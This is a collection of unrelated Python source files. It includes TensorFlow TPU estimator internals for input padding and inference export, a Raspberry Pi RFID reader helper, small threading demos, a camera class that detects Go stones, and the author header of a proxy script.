self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = tf.compat.v1.data.make_initializable_iterator(
self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = tf.compat.v1.ones_like(
signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = tf.dtypes.bool
if self._stop:
stopping = tf.ones(shape=shape, dtype=dtype)
else:
stopping = tf.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return tf.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, tf.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return tf.math.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = tf.compat.v1.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = tf.constant(batch_size, tf.dtypes.int32)
check_greater = tf.compat.v1.debugging.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with tf.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = tf.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = tf.compat.v1.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return tf.nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = tf.compat.v1.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = tf.math.equal(batch_size, tensor.shape[0])
with tf.control_dependencies([check_batch_size]):
return tf.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - tf.math.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. Given that, the sliced padding mask should have all 0's.
# If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = tf.math.equal(
tf.math.reduce_sum(sliced_padding_mask), 0)
with tf.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = tf.math.equal(tf.math.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return tf.compat.v1.cond(
tf.math.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return tf.nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in tf.nest.flatten(batch_features) if isinstance(x, tf.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
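    # A concrete example (for illustration only): real_batch_size=3 with
    # batch_size=5 (missing_count=2) produces the int32 mask [0, 0, 0, 1, 1];
    # zeros mark real examples and ones mark padded ones.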
padding_mask = tf.concat([
tf.zeros((real_batch_size,), dtype=tf.dtypes.int32),
tf.ones((missing_count,), dtype=tf.dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider using Tensors with smaller shapes or reducing the batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
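# A minimal usage sketch (hypothetical names: `my_estimator` and
# `my_serving_input_receiver_fn` are assumed to be defined by the caller;
# the export path is only illustrative):
#
#   export_dir = export_estimator_savedmodel(
#       my_estimator,
#       '/tmp/tpu_export',
#       my_serving_input_receiver_fn)
#   # `export_dir` is the timestamped SavedModel directory that was written.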
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
using inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(features, computation, batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = tf.nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = tf.nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn, labels, config, params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tf.compat.v1.tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copies of `config` and `params` in case the user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = tf.nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = tf.nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=100):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts the computation on the TPU, adds batching around it, and round-robins
the computation between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this. If None or 0,
no batching will be done.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 100.
Returns:
The unbatched computation output Tensors.
"""
def _tpu_call(args):
"""Function to either call or feed into BatchFunction."""
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
"""Function to feed into the TPUPartitionedCallOp."""
tensors_on_cpu = tf.compat.v1.tpu.rewrite(computation, args)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
return tensors_on_cpu
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
if not max_batch_size:
return _tpu_call(inputs_to_tpu)
@tf.nondifferentiable_batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
"""Function to feed into the BatchOp."""
return _tpu_call(args)
return batched_tpu_computation(*inputs_to_tpu)
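# A minimal sketch of calling `inference_on_tpu` from a PREDICT-mode model_fn
# (hypothetical: `my_model`, the 'images' feature key, and the batching
# parameters below are illustrative assumptions, not part of this module):
#
#   def my_computation(images):
#     return tf.nn.softmax(my_model(images))
#
#   probabilities = inference_on_tpu(
#       my_computation,
#       inputs_to_tpu=[features['images']],
#       num_batch_threads=1,
#       max_batch_size=8,
#       batch_timeout_micros=5000)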
|
pi_rc522_helper.py
|
#coding=utf-8
from pirc522 import RFID
import time
import struct
from threading import Thread
import inspect
import ctypes
"""
A helper class based on the pirc522 library.
You can install pirc522 with pip: 'pip install pi-rc522'.
@auth - xuwh
@date - 2018-9-9
@git - https://github.com/imaxu
"""
class PI_RC522_Helper():
# Last card UID read, as a decimal number
last_uid = None
# Current card UID
current_uid = None
# RFID instance
rdr = None
# Callback invoked when a card moves into range
on_move_in = None
# Callback invoked when a card is removed
on_move_out = None
# Polling interval as a float, in seconds. It affects read accuracy; values between 0.25 and 0.3 are recommended.
wait_time = 0.3
def __init__(self):
self.rdr = RFID()
self.last_uid = 0
self.current_uid = 0
def scan(self,onIn,onOut):
self.on_move_in = onIn
self.on_move_out = onOut
scan_thread = Thread(target=self.__scan__)
try:
scan_thread.start()
self.__check__()
except KeyboardInterrupt:
self.__async_raise__(scan_thread.ident, SystemExit)
print("退出读卡进程")
finally:
self.rdr.cleanup()
pass
def __async_raise__(self,tid, exctype):
"""raises the exception, performs cleanup if needed"""
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def __scan__(self):
while True:
self.rdr.wait_for_tag()
state,tag_type = self.rdr.request()
if not state:
state,uid = self.rdr.anticoll()
if not state:
self.current_uid = struct.unpack('<L',bytes(uid[0:4]))[0]
continue
self.current_uid = 0
def __check__(self):
while True:
time.sleep(self.wait_time)
if self.current_uid == 0:
if self.current_uid != self.last_uid:
self.last_uid = 0
if self.on_move_out:
self.on_move_out()
else:
if self.current_uid != self.last_uid:
self.last_uid = self.current_uid
if self.on_move_in:
self.on_move_in(self.current_uid)
# test demo
def onCardIn(uid):
print("识别到卡号->",uid)
def onCardOut():
print("<--卡移出")
def main():
helper = PI_RC522_Helper()
helper.scan(onCardIn,onCardOut)
if __name__ == '__main__':
main()
|
demo.py
|
import sys
from threading import Thread
from mypkg.a import absolute, relative
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("method", choices=["absolute", "relative"],
help="Import type for mypkg.b")
parser.add_argument("--threads", "-t", type=int, default=2,
help="Number of threads to run")
args = parser.parse_args()
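# sys.setswitchinterval() sets how often (in seconds) CPython considers
# switching between threads; 0.005 s is also the default value, pinned here
# explicitly.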
sys.setswitchinterval(0.005)
numThreads = args.threads
threads = [None] * numThreads
for i in range(numThreads):
threads[i] = Thread(target=globals()[args.method])
for i in range(numThreads):
threads[i].start()
for i in range(numThreads):
threads[i].join()
# Done here to avoid possible interference with timing-sensitive code above
print(f"\nPython executable: {sys.executable}",
f"\nPython version:\n{sys.version}\n",
sep="")
|
threads_program.py
|
import datetime
import colorama
import random
import time
import threading
def main():
t0 = datetime.datetime.now()
print(colorama.Fore.WHITE + "App started.", flush=True)
data = []
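# Shared work list between the producer and consumer threads. Individual
# list.append() and list.pop(0) calls are thread-safe under CPython's GIL,
# so this simple demo gets by without an explicit lock.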
threads = [
threading.Thread(target=generate_data, args=(20, data), daemon=True),
threading.Thread(target=generate_data, args=(20, data), daemon=True),
threading.Thread(target=process_data, args=(40, data), daemon=True),
]
abort_thread = threading.Thread(target=check_cancel, daemon=True)
abort_thread.start()
[t.start() for t in threads]
while any([t.is_alive() for t in threads]):
[t.join(.001) for t in threads]
if not abort_thread.is_alive():
print("Cancelling on your request!", flush=True)
break
dt = datetime.datetime.now() - t0
print(colorama.Fore.WHITE + f"App exiting, total time: {dt.total_seconds():,.2f} sec.", flush=True)
def check_cancel():
print(colorama.Fore.RED + "Press enter to cancel...", flush=True)
input()
def generate_data(num: int, data: list):
for idx in range(1, num + 1):
item = idx * idx
data.append((item, datetime.datetime.now()))
print(colorama.Fore.YELLOW + f" -- generated item {idx}", flush=True)
time.sleep(random.random() + .5)
def process_data(num: int, data: list):
processed = 0
while processed < num:
item = None
if data:
item = data.pop(0)
if not item:
time.sleep(.01)
continue
processed += 1
value = item[0]
t = item[1]
dt = datetime.datetime.now() - t
print(colorama.Fore.CYAN +
f" +++ Processed value {value} after {dt.total_seconds():,.2f} sec.", flush=True)
time.sleep(.5)
if __name__ == '__main__':
main()
|
CameraStoneDetection.py
|
#!/usr/bin/env python
# #############################
# # GO stone camera detection #
# #############################
#
# Licensed under MIT License (MIT)
#
# Copyright (c) 2018 Daniel Springwald | daniel@springwald.de
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import os, sys
from multiprocessing import Process, Manager, Value, Array
from multiprocessing import Pool, Array, Process
from threading import Thread
my_file = os.path.abspath(__file__)
my_path ='/'.join(my_file.split('/')[0:-1])
sys.path.insert(0,my_path + "/libs" )
sys.path.insert(0,my_path + "/libs/opencv" )
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
class CameraStoneDetection():
_showImage = True
_camera = None
_rawCapture = None
_stream = None
_cascadeBlack = None
_cascadeWhite = None
_useGrayscale = True;
__cameraResolutionX = 640*2
__cameraResolutionY = 480*2
_windowName = "iGoBot camera";
RectsBlack = [];
RectsWhite = [];
_counter = 0;
_process = None
_released = False
# define settings of brightness and contrast
_settings = [[50,50],[50,30],[50,80],[60,30],[60,50],[60,80],[70,50]];
def __init__(self):
print("camera init")
self.posXFace = -1
self.posYFace = -1
self.InitCamera()
#thread = Thread(target=self._update, args=())
#thread.nice = -20 # -20 high prio, 20 low prio
#thread.start()
#thread.nice = -20
def SetCameraSettings(self, settingsNo):
if (settingsNo >= len(self._settings)):
return False;
        self._camera.brightness = self._settings[settingsNo][0];
        self._camera.contrast = self._settings[settingsNo][1];
return True;
def detect(self, img, cascade):
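        # Run the Haar cascade over the frame; minSize scales with the camera
        # resolution so detections smaller than ~1/30 of the image are ignored.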
rects = cascade.detectMultiScale(img, scaleFactor=1.1, minNeighbors=3, minSize=(int(self.__cameraResolutionX / 30), int( self.__cameraResolutionY / 30)), flags=cv2.CASCADE_SCALE_IMAGE)
if len(rects) == 0:
return []
#rects[:,2:] += rects[:,:2] # convert from [[x,y,h,b]] to [[x1,y1,x2,y2]]
return rects
def draw_rects(self, img, rects, color):
for x, y, b, h in rects:
cv2.rectangle(img, (x, y), (x+b, y+h), color, 4)
def InitCamera(self):
print("camera start")
cv2.destroyAllWindows()
cv2.namedWindow(self._windowName, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self._windowName, 400,300)
# initialize the camera and grab a reference to the raw camera capture
self._camera = PiCamera()
self._camera.resolution = (self.__cameraResolutionX, self.__cameraResolutionY)
self.SetCameraSettings(settingsNo=0);
#self._camera.contrast = 50;
#self._camera.brightness = 50;
self._camera.framerate = 12
self._rawCapture = PiRGBArray(self._camera, size=(self.__cameraResolutionX, self.__cameraResolutionY))
#self._stream = self._camera.capture_continuous(self._rawCapture, format="bgr", use_video_port=True)
# allow the camera to warmup
time.sleep(0.2)
if (self._useGrayscale):
cascade_black_fn = "stoneDetection/black-cascade-grayscale.xml"
cascade_white_fn = "stoneDetection/white-cascade-grayscale.xml"
else:
cascade_black_fn = "stoneDetection/black-cascade.xml"
cascade_white_fn = "stoneDetection/white-cascade.xml"
self._cascadeBlack = cv2.CascadeClassifier(cascade_black_fn)
self._cascadeWhite = cv2.CascadeClassifier(cascade_white_fn)
print("camera start done")
def Update(self):
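        # Capture a single frame, run the black- and white-stone cascades on it
        # and, if enabled, show the annotated image in the preview window.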
#global ftimestamp, getFPS
# keep looping infinitely until the thread is stopped
#print ("<<<" , self._stream);
# for f in self._stream:
if (True):
self._camera.capture(self._rawCapture, format="bgr")
#image = rawCapture.array
self._counter = self._counter+1;
#print (self._counter);
if (self._counter > 100):
self._counter = 0;
# grab the frame from the stream and clear the stream in
# preparation for the next frame
#image = f.array
image = self._rawCapture.array
rawImage = image
if (self._useGrayscale):
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
#self_actualFrame = image
self._rawCapture.truncate(0)
self.RectsBlack = self.detect(image, self._cascadeBlack)
self.RectsWhite = self.detect(image, self._cascadeWhite)
if (self._showImage==True):
key = cv2.waitKey(1) & 0xFF
self.draw_rects(rawImage, self.RectsBlack, (0, 0, 0))
self.draw_rects(rawImage, self.RectsWhite, (255, 255, 255))
cv2.putText(rawImage, str(self._counter), (10,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))
cv2.imshow(self._windowName, rawImage)
# if the thread indicator variable is set, stop the thread
            # and release camera resources
#if (self._released == True):
#self._stream.close()
#self._rawCapture.close()
#self._camera.close()
#return
#time.sleep(0.01)
#return;
def Release(self):
if (self._released == False):
self._released = True
time.sleep(0.5)
print ("shutting down camera")
#self._stream.close()
self._rawCapture.close()
self._camera.close()
def __del__(self):
self.Release()
import atexit
def exit_handler():
testCamera.Release()
if __name__ == '__main__':
from hardware.Light import Light;
light = Light();
light.On();
    testCamera = CameraStoneDetection();
    atexit.register(exit_handler)
setting = 0;
for c in range(0,1000):
testCamera.Update();
setting = setting+1;
if (testCamera.SetCameraSettings(setting)==False):
setting = 0;
testCamera.SetCameraSettings(setting);
time.sleep(1)
testCamera.Release()
|
proxy.py
|
#!/usr/bin/env python2
# coding:utf-8
# Based on GAppProxy 2.0.0 by Du XiaoGang <dugang.2008@gmail.com>
# Based on WallProxy 0.4.0 by Hust Moon <www.ehust@gmail.com>
# Contributor:
# Phus Lu <phus.lu@gmail.com>
# Hewig Xu <hewigovens@gmail.com>
# Ayanamist Yang <ayanamist@gmail.com>
# V.E.O <V.E.O@tom.com>
# Max Lv <max.c.lv@gmail.com>
# AlsoTang <alsotang@gmail.com>
# Christopher Meng <cickumqt@gmail.com>
# Yonsm Guo <YonsmGuo@gmail.com>
# Parkman <cseparkman@gmail.com>
# Ming Bai <mbbill@gmail.com>
# Bin Yu <yubinlove1991@gmail.com>
# lileixuan <lileixuan@gmail.com>
# Cong Ding <cong@cding.org>
# Zhang Youfu <zhangyoufu@gmail.com>
# Lu Wei <luwei@barfoo>
# Harmony Meow <harmony.meow@gmail.com>
# logostream <logostream@gmail.com>
# Rui Wang <isnowfy@gmail.com>
# Wang Wei Qiang <wwqgtxx@gmail.com>
# Felix Yan <felixonmars@gmail.com>
# QXO <qxodream@gmail.com>
# Geek An <geekan@foxmail.com>
# Poly Rabbit <mcx_221@foxmail.com>
# oxnz <yunxinyi@gmail.com>
